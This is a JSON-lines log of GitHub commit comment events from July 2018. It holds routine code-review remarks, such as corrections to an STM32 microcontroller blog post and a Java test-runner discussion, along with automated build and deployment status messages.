{"id":"7932699721","type":"CommitCommentEvent","actor":{"login":"ThomasGravekamp"},"repo":{"name":"MrOneTwo/mronetwo.github.io"},"payload":{"comment":{"id":29630367,"position":19,"line":19,"path":"_posts/2018-06-19-stm32_03.md","commit_id":"fc5445aa6b826a7c6e10b2b8189b6c7ce0f4b087","created_at":"2018-07-07T17:52:10Z","updated_at":"2018-07-07T17:52:10Z","author_association":"NONE","body":"producer -> manufacturer\r\nThe way the built-in bootloader can be used differs per sub-family, [this application note](https://www.st.com/content/ccc/resource/technical/document/application_note/b9/9b/16/3a/12/1e/40/0c/CD00167594.pdf/files/CD00167594.pdf/jcr:content/translations/en.CD00167594.pdf) lists all ways in which you can use the built-in bootloader per groups of devices."}},"created_at":"2018-07-07T17:52:10Z"}
{"id":"7932700959","type":"CommitCommentEvent","actor":{"login":"aeyakovenko"},"repo":{"name":"solana-labs/solana"},"payload":{"comment":{"id":29630369,"position":null,"line":null,"path":null,"commit_id":"cdbb59b8ddd0f72cd7cc63e4556cf1a1d46f0b8f","created_at":"2018-07-07T17:53:08Z","updated_at":"2018-07-07T17:53:08Z","author_association":"MEMBER","body":"@garious, we need the drop before join"}},"created_at":"2018-07-07T17:53:08Z"}
{"id":"7932702810","type":"CommitCommentEvent","actor":{"login":"faizana1"},"repo":{"name":"faizana1/test_another"},"payload":{"comment":{"id":29630373,"position":null,"line":null,"path":null,"commit_id":"1f5602f0efbf14853250bea03db6a1acab45a76e","created_at":"2018-07-07T17:54:40Z","updated_at":"2018-07-07T17:54:40Z","author_association":"OWNER","body":"nbcd"}},"created_at":"2018-07-07T17:54:40Z"}
{"id":"7932703584","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"Oreo-Harpia/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":29630374,"position":null,"line":null,"path":null,"commit_id":"44976f8fe2d9877fdf0bde43d237a166a4c195a2","created_at":"2018-07-07T17:55:17Z","updated_at":"2018-07-07T17:55:17Z","author_association":"NONE","body":"I checked \r\nThese commits\r\nhttps://github.com/LineageOS/android_hardware_ril/commit/c8b03a38734d9551ae5e9b721b09a6f3027c48d2\r\nhttps://github.com/LineageOS/android_hardware_ril/commit/7fd9ea42f1e1a5328dbeb74ba536356cd8debde3\r\n"}},"created_at":"2018-07-07T17:55:17Z"}
{"id":"7932703656","type":"CommitCommentEvent","actor":{"login":"NeryMatheus"},"repo":{"name":"NeryMatheus/PHP"},"payload":{"comment":{"id":29630375,"position":null,"line":null,"path":null,"commit_id":"96ca68358041ddd1e84d2407dfaf576d5afa8e80","created_at":"2018-07-07T17:55:20Z","updated_at":"2018-07-07T17:55:20Z","author_association":"OWNER","body":"Puts, um arquivo por cima do outro"}},"created_at":"2018-07-07T17:55:20Z"}
{"id":"7932704036","type":"CommitCommentEvent","actor":{"login":"ThomasGravekamp"},"repo":{"name":"MrOneTwo/mronetwo.github.io"},"payload":{"comment":{"id":29630379,"position":22,"line":22,"path":"_posts/2018-06-19-stm32_03.md","commit_id":"fc5445aa6b826a7c6e10b2b8189b6c7ce0f4b087","created_at":"2018-07-07T17:55:40Z","updated_at":"2018-07-07T17:55:40Z","author_association":"NONE","body":"-> missing url on Reference Manual\r\n...that **any of the memories** can be... ... its **actual** address..."}},"created_at":"2018-07-07T17:55:40Z"}
{"id":"7932705683","type":"CommitCommentEvent","actor":{"login":"GrandyB"},"repo":{"name":"CatxFish/motion-filter"},"payload":{"comment":{"id":29630381,"position":null,"line":null,"path":null,"commit_id":"5f94cdb47e1a28489cdc7a8d0aee5ac4f786f29d","created_at":"2018-07-07T17:56:59Z","updated_at":"2018-07-07T17:56:59Z","author_association":"CONTRIBUTOR","body":"hmmm is there a setting I am missing in visual studio?"}},"created_at":"2018-07-07T17:56:59Z"}
{"id":"7932706341","type":"CommitCommentEvent","actor":{"login":"forax"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29630382,"position":7,"line":39,"path":"plugins/tester/src/main/java/com.github.forax.pro.plugin.tester/com/github/forax/pro/plugin/tester/TesterRunner.java","commit_id":"c404529c767c719c07523eeb80fea0c53776660f","created_at":"2018-07-07T17:57:29Z","updated_at":"2018-07-07T17:57:29Z","author_association":"OWNER","body":"a stupid mistake, sorry !"}},"created_at":"2018-07-07T17:57:29Z"}
{"id":"7932712284","type":"CommitCommentEvent","actor":{"login":"mattelibe"},"repo":{"name":"mattelibe/ProgettoIngSw2"},"payload":{"comment":{"id":29630396,"position":null,"line":null,"path":null,"commit_id":"766ca52ae7c9cb4b6fda09f45615e51eb4c0aa68","created_at":"2018-07-07T18:02:05Z","updated_at":"2018-07-07T18:02:05Z","author_association":"OWNER","body":"__apiary.manifest contains reference to non-existent file in repository.__ (Autogenerated message from apiary.io)\n+ apiary.apib"}},"created_at":"2018-07-07T18:02:05Z"}
{"id":"7932712584","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29630397,"position":7,"line":305,"path":"lib/distributions.sh","commit_id":"92258e0298c629059c13f4abc8f762a00a40afd2","created_at":"2018-07-07T18:02:18Z","updated_at":"2018-07-07T18:02:18Z","author_association":"MEMBER","body":"Fixed with https://github.com/armbian/build/commit/e91fb953e2d733d217624e600ac988f16cc99e12"}},"created_at":"2018-07-07T18:02:18Z"}
{"id":"7932713486","type":"CommitCommentEvent","actor":{"login":"ThomasGravekamp"},"repo":{"name":"MrOneTwo/mronetwo.github.io"},"payload":{"comment":{"id":29630401,"position":30,"line":30,"path":"_posts/2018-06-19-stm32_03.md","commit_id":"fc5445aa6b826a7c6e10b2b8189b6c7ce0f4b087","created_at":"2018-07-07T18:03:04Z","updated_at":"2018-07-07T18:03:04Z","author_association":"NONE","body":"...that in ARM Cortex-M... -> remove the"}},"created_at":"2018-07-07T18:03:04Z"}
{"id":"7932714227","type":"CommitCommentEvent","actor":{"login":"sormuras"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29630402,"position":7,"line":39,"path":"plugins/tester/src/main/java/com.github.forax.pro.plugin.tester/com/github/forax/pro/plugin/tester/TesterRunner.java","commit_id":"c404529c767c719c07523eeb80fea0c53776660f","created_at":"2018-07-07T18:03:39Z","updated_at":"2018-07-07T18:03:39Z","author_association":"COLLABORATOR","body":"Mh, needed for debugging, right?\r\n\r\nPerhaps we should make it configurable. ;-)"}},"created_at":"2018-07-07T18:03:39Z"}
{"id":"7932715587","type":"CommitCommentEvent","actor":{"login":"SsebuufuEddy231"},"repo":{"name":"omachol/GROUP-15"},"payload":{"comment":{"id":29630404,"position":null,"line":null,"path":null,"commit_id":"5507e074a85e41ad5b51ffb8500b20632348b733","created_at":"2018-07-07T18:04:41Z","updated_at":"2018-07-07T18:04:41Z","author_association":"COLLABORATOR","body":"\r\n[CONCEPT PAPER GROUP 15.docx](https://github.com/omachol/GROUP-15/files/2172962/CONCEPT.PAPER.GROUP.15.docx)\r\nour concept paper "}},"created_at":"2018-07-07T18:04:41Z"}
{"id":"7932716661","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29630407,"position":null,"line":null,"path":null,"commit_id":"e842f9580efe872b8e79a0e19fec5a3e1e253a7a","created_at":"2018-07-07T18:05:19Z","updated_at":"2018-07-07T18:05:19Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2310 of 2310 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-07T18:05:19Z"}
{"id":"7932716693","type":"CommitCommentEvent","actor":{"login":"odersky"},"repo":{"name":"lampepfl/dotty"},"payload":{"comment":{"id":29630408,"position":11,"line":754,"path":"compiler/src/dotty/tools/dotc/typer/Namer.scala","commit_id":"0c35b8f1b132da60fe07c866ef7b63e25b17e775","created_at":"2018-07-07T18:05:20Z","updated_at":"2018-07-07T18:05:20Z","author_association":"CONTRIBUTOR","body":"Ah yes, well spotted."}},"created_at":"2018-07-07T18:05:20Z"}
{"id":"7932717445","type":"CommitCommentEvent","actor":{"login":"ThomasGravekamp"},"repo":{"name":"MrOneTwo/mronetwo.github.io"},"payload":{"comment":{"id":29630410,"position":35,"line":35,"path":"_posts/2018-06-19-stm32_03.md","commit_id":"fc5445aa6b826a7c6e10b2b8189b6c7ce0f4b087","created_at":"2018-07-07T18:05:58Z","updated_at":"2018-07-07T18:05:58Z","author_association":"NONE","body":"**STM32** **devices use** 32 bit registers.\r\n**The** next 4 byte value starts at address 0x0000 0004. \r\n...isn't random, it's just the address of the next 32bit register. The microcontroller just works through the memory sequentially."}},"created_at":"2018-07-07T18:05:58Z"}
{"id":"7932718070","type":"CommitCommentEvent","actor":{"login":"MASHinfo"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29630411,"position":null,"line":null,"path":null,"commit_id":"c3fb11c2c98a5c28ece6a27093a0f9def350ac64","created_at":"2018-07-07T18:06:25Z","updated_at":"2018-07-07T18:06:25Z","author_association":"CONTRIBUTOR","body":"Thanks for correcting\r\nhttps://github.com/mamedev/mame/commit/28ffb7fb9825207e8beb22ce6797c3a2da6f84a0"}},"created_at":"2018-07-07T18:06:25Z"}
{"id":"7932718279","type":"CommitCommentEvent","actor":{"login":"forax"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29630412,"position":7,"line":39,"path":"plugins/tester/src/main/java/com.github.forax.pro.plugin.tester/com/github/forax/pro/plugin/tester/TesterRunner.java","commit_id":"c404529c767c719c07523eeb80fea0c53776660f","created_at":"2018-07-07T18:06:36Z","updated_at":"2018-07-07T18:06:36Z","author_association":"OWNER","body":"It supposes that the module and the package have the same name which may be not true"}},"created_at":"2018-07-07T18:06:36Z"}
{"id":"7932718428","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29630413,"position":null,"line":null,"path":null,"commit_id":"e842f9580efe872b8e79a0e19fec5a3e1e253a7a","created_at":"2018-07-07T18:06:44Z","updated_at":"2018-07-07T18:06:44Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T18:06:44Z"}
{"id":"7932718781","type":"CommitCommentEvent","actor":{"login":"blazersand2000"},"repo":{"name":"DCrisman/VideoCat"},"payload":{"comment":{"id":29630414,"position":null,"line":null,"path":null,"commit_id":"a54650213605d703569f3c7a4d81da21ae354e26","created_at":"2018-07-07T18:07:03Z","updated_at":"2018-07-07T18:07:03Z","author_association":"COLLABORATOR","body":"I forgot to mention I also made some changes to process automation to use the settings for auto encoding, compressing, and uploading."}},"created_at":"2018-07-07T18:07:03Z"}
{"id":"7932719549","type":"CommitCommentEvent","actor":{"login":"nhalstead"},"repo":{"name":"nhalstead/Content-Switcher"},"payload":{"comment":{"id":29630415,"position":null,"line":null,"path":null,"commit_id":"fb4a2209d51ba9ac0aace5e2645724ed60ea4b79","created_at":"2018-07-07T18:07:41Z","updated_at":"2018-07-07T18:07:41Z","author_association":"OWNER","body":"https://jsfiddle.net/nhalstead/9yokv06z/4/"}},"created_at":"2018-07-07T18:07:41Z"}
{"id":"7932723499","type":"CommitCommentEvent","actor":{"login":"sormuras"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29630419,"position":7,"line":39,"path":"plugins/tester/src/main/java/com.github.forax.pro.plugin.tester/com/github/forax/pro/plugin/tester/TesterRunner.java","commit_id":"c404529c767c719c07523eeb80fea0c53776660f","created_at":"2018-07-07T18:10:56Z","updated_at":"2018-07-07T18:10:56Z","author_association":"COLLABORATOR","body":"Perhaps pass a list of package names...\r\n\r\n...or even more generic, consume list of `DiscoverySelector`s. The end-user migh create them via: https://junit.org/junit5/docs/current/api/org/junit/platform/engine/discovery/DiscoverySelectors.html#selectModule(java.lang.String)"}},"created_at":"2018-07-07T18:10:56Z"}
{"id":"7932723612","type":"CommitCommentEvent","actor":{"login":"ThomasGravekamp"},"repo":{"name":"MrOneTwo/mronetwo.github.io"},"payload":{"comment":{"id":29630420,"position":37,"line":37,"path":"_posts/2018-06-19-stm32_03.md","commit_id":"fc5445aa6b826a7c6e10b2b8189b6c7ce0f4b087","created_at":"2018-07-07T18:11:01Z","updated_at":"2018-07-07T18:11:01Z","author_association":"NONE","body":"...address of the instruction currently being executed... ...that instructions are just pieces of data....\r\n**The** microcontroller\r\n\r\nTechnically the PC is always 2 instructions ahead due to prefetching. Maybe change the description to something like: The PC holds the address value of the next instruction to fetch from memory."}},"created_at":"2018-07-07T18:11:01Z"}
{"id":"7932724481","type":"CommitCommentEvent","actor":{"login":"RenderBroken"},"repo":{"name":"joshuous/android_kernel_oneplus_msm8998"},"payload":{"comment":{"id":29630422,"position":null,"line":null,"path":null,"commit_id":"0f7466668279bab138bf1d4131bbc2a63cc79c81","created_at":"2018-07-07T18:11:43Z","updated_at":"2018-07-07T18:11:43Z","author_association":"COLLABORATOR","body":"I am not sure how I feel about this change. They wanted to remove it on WAHOO but couldn't because it caused issues. I wish they would have outlined why they wanted to remove it but because of that it makes me leary. "}},"created_at":"2018-07-07T18:11:43Z"}
{"id":"7932727923","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/IIIF-AV-player"},"payload":{"comment":{"id":29630425,"position":null,"line":null,"path":null,"commit_id":"d3800293196a7ea3173bf2b4e08f561dd33b2a31","created_at":"2018-07-07T18:14:38Z","updated_at":"2018-07-07T18:14:38Z","author_association":"MEMBER","body":"You can also check if 'presentation/3' is in the `@id` property... "}},"created_at":"2018-07-07T18:14:38Z"}
{"id":"7932728608","type":"CommitCommentEvent","actor":{"login":"choijangho2"},"repo":{"name":"choijangho2/mingether"},"payload":{"comment":{"id":29630427,"position":3,"line":3,"path":"README.md","commit_id":"3acb0e5b57768ca307e607a184132ee237b504ee","created_at":"2018-07-07T18:15:13Z","updated_at":"2018-07-07T18:15:13Z","author_association":"OWNER","body":"1233"}},"created_at":"2018-07-07T18:15:13Z"}
{"id":"7932729018","type":"CommitCommentEvent","actor":{"login":"alwey"},"repo":{"name":"cutechess/cutechess"},"payload":{"comment":{"id":29630430,"position":5,"line":5,"path":"AUTHORS","commit_id":"c35723393cde881866ed1cc8019212d485055acd","created_at":"2018-07-07T18:15:33Z","updated_at":"2018-07-07T18:15:33Z","author_association":"CONTRIBUTOR","body":"Alfred Weyers (alwey)"}},"created_at":"2018-07-07T18:15:33Z"}
{"id":"7932729346","type":"CommitCommentEvent","actor":{"login":"cdsmith"},"repo":{"name":"google/codeworld"},"payload":{"comment":{"id":29630432,"position":null,"line":null,"path":null,"commit_id":"32eac95d1af2a6fcab7e62d9b93eed0ecbefb2e5","created_at":"2018-07-07T18:15:52Z","updated_at":"2018-07-07T18:15:52Z","author_association":"COLLABORATOR","body":"@kammitama5 FYI, this fixes about 5 more typos in `describePicture`.  I think this is a good example of the importance of choosing and sticking to conventions that match the structure of what you're doing.  I found these typos because I reformatted the code to put all the commas and indents and such in the same places, and then noticed things didn't line up the way I expected."}},"created_at":"2018-07-07T18:15:52Z"}
{"id":"7932730329","type":"CommitCommentEvent","actor":{"login":"Adorfer"},"repo":{"name":"freifunk-gluon/gluon"},"payload":{"comment":{"id":29630433,"position":null,"line":null,"path":null,"commit_id":"2493d1c3d22221c5ed83d2ae055b9ebaeca8b281","created_at":"2018-07-07T18:16:42Z","updated_at":"2018-07-07T18:16:42Z","author_association":"CONTRIBUTOR","body":"Please consider replacing \"concrete time frame\" by somethinge like \"definitive time frame\" "}},"created_at":"2018-07-07T18:16:42Z"}
{"id":"7932731937","type":"CommitCommentEvent","actor":{"login":"hegelstad"},"repo":{"name":"invertase/react-native-firebase"},"payload":{"comment":{"id":29630435,"position":41,"line":95,"path":"tests/android/app/build.gradle","commit_id":"dae0645006bc732480731731909547b86448905a","created_at":"2018-07-07T18:18:04Z","updated_at":"2018-07-07T18:18:04Z","author_association":"NONE","body":"Bump it to 17.1.0 which is the latest version."}},"created_at":"2018-07-07T18:18:04Z"}
{"id":"7932733156","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630436,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-07T18:19:08Z","updated_at":"2018-07-07T18:19:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:19:08Z"}
{"id":"7932733606","type":"CommitCommentEvent","actor":{"login":"jcfrosty"},"repo":{"name":"D00Med/LegendofMinetest"},"payload":{"comment":{"id":29630437,"position":null,"line":null,"path":null,"commit_id":"4ccdd87e5ecf6efcbcb436afa0469e9a20bad97a","created_at":"2018-07-07T18:19:28Z","updated_at":"2018-07-07T18:19:28Z","author_association":"CONTRIBUTOR","body":"This appears to have made the game playable :D ! No longer crashes upon launch or 5 min afterwards.\r\n\r\nIs there a way to make the rupies,bombs, and keys hud on the left work appropriately when playing as a server and not just a single player?"}},"created_at":"2018-07-07T18:19:28Z"}
{"id":"7932733988","type":"CommitCommentEvent","actor":{"login":"sadeghi336git"},"repo":{"name":"sadeghi336git/-RK_ID-in-SKINNY"},"payload":{"comment":{"id":29630438,"position":null,"line":null,"path":null,"commit_id":"40c690f26329ee83bfa10205c062a0ed6374441c","created_at":"2018-07-07T18:19:48Z","updated_at":"2018-07-07T18:19:48Z","author_association":"OWNER","body":"-"}},"created_at":"2018-07-07T18:19:48Z"}
{"id":"7932734680","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630440,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-07T18:20:17Z","updated_at":"2018-07-07T18:20:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:20:17Z"}
{"id":"7932735703","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630443,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-07T18:21:08Z","updated_at":"2018-07-07T18:21:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:21:08Z"}
{"id":"7932736096","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630444,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-07T18:21:27Z","updated_at":"2018-07-07T18:21:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:21:27Z"}
{"id":"7932736655","type":"CommitCommentEvent","actor":{"login":"enaut"},"repo":{"name":"Hideakiii/School-Tasks"},"payload":{"comment":{"id":29630446,"position":11,"line":94,"path":"Avalonion_v4/Avalonion_v6.py","commit_id":"be54430ba62c1b1b1234cf1db8ae911690cd701d","created_at":"2018-07-07T18:21:59Z","updated_at":"2018-07-07T18:21:59Z","author_association":"CONTRIBUTOR","body":"Die Zuweisung darf nur einmal pro Zeile vorkommen. Also im Prinzip darf nur ein einfaches `=` pro Zeile stehen.\r\nDas gilt auch für den `+=` -Operator, der quasi eine Abkürzung ist für:\r\n`self.pos[1] =  self.pos[1] + speed[1]`\r\nwird zu `self.pos[1] += speed[1]`\r\n\r\nFür die vergleichsoperatoren wie `>=` gilt das nicht."}},"created_at":"2018-07-07T18:21:59Z"}
{"id":"7932736682","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29630447,"position":null,"line":null,"path":null,"commit_id":"857fba2d635ed59156a07e0b691b7d1ee274ce28","created_at":"2018-07-07T18:22:01Z","updated_at":"2018-07-07T18:22:01Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-07T18:22:01Z"}
{"id":"7932744518","type":"CommitCommentEvent","actor":{"login":"ThomasGravekamp"},"repo":{"name":"MrOneTwo/mronetwo.github.io"},"payload":{"comment":{"id":29630477,"position":48,"line":48,"path":"_posts/2018-06-19-stm32_03.md","commit_id":"fc5445aa6b826a7c6e10b2b8189b6c7ce0f4b087","created_at":"2018-07-07T18:28:30Z","updated_at":"2018-07-07T18:28:30Z","author_association":"NONE","body":"producer -> manufacturer\r\nThe interrupt vector for ARM Cortex-M devices is always located at 0x0000 0000, so it starts with the stack pointer and after that there are 15 ARM Cortex-M specific interrupt handler pointers. After those, the device-specific handlers will put.\r\n\r\nNormally, all the non overridden handlers will point to something like a default handler, which is essentially a function with an endless loop to preserve the CPU state for debugging."}},"created_at":"2018-07-07T18:28:30Z"}
{"id":"7932744540","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630478,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-07T18:28:31Z","updated_at":"2018-07-07T18:28:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:28:31Z"}
{"id":"7932745437","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29630480,"position":null,"line":null,"path":null,"commit_id":"f24de373a74a70701baa3d09a0ab858e88c64687","created_at":"2018-07-07T18:29:22Z","updated_at":"2018-07-07T18:29:22Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-428](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-428).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-428-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-07T18:29:22Z"}
{"id":"7932745613","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630481,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-07T18:29:31Z","updated_at":"2018-07-07T18:29:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:29:31Z"}
{"id":"7932745816","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630482,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-07T18:29:41Z","updated_at":"2018-07-07T18:29:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:29:41Z"}
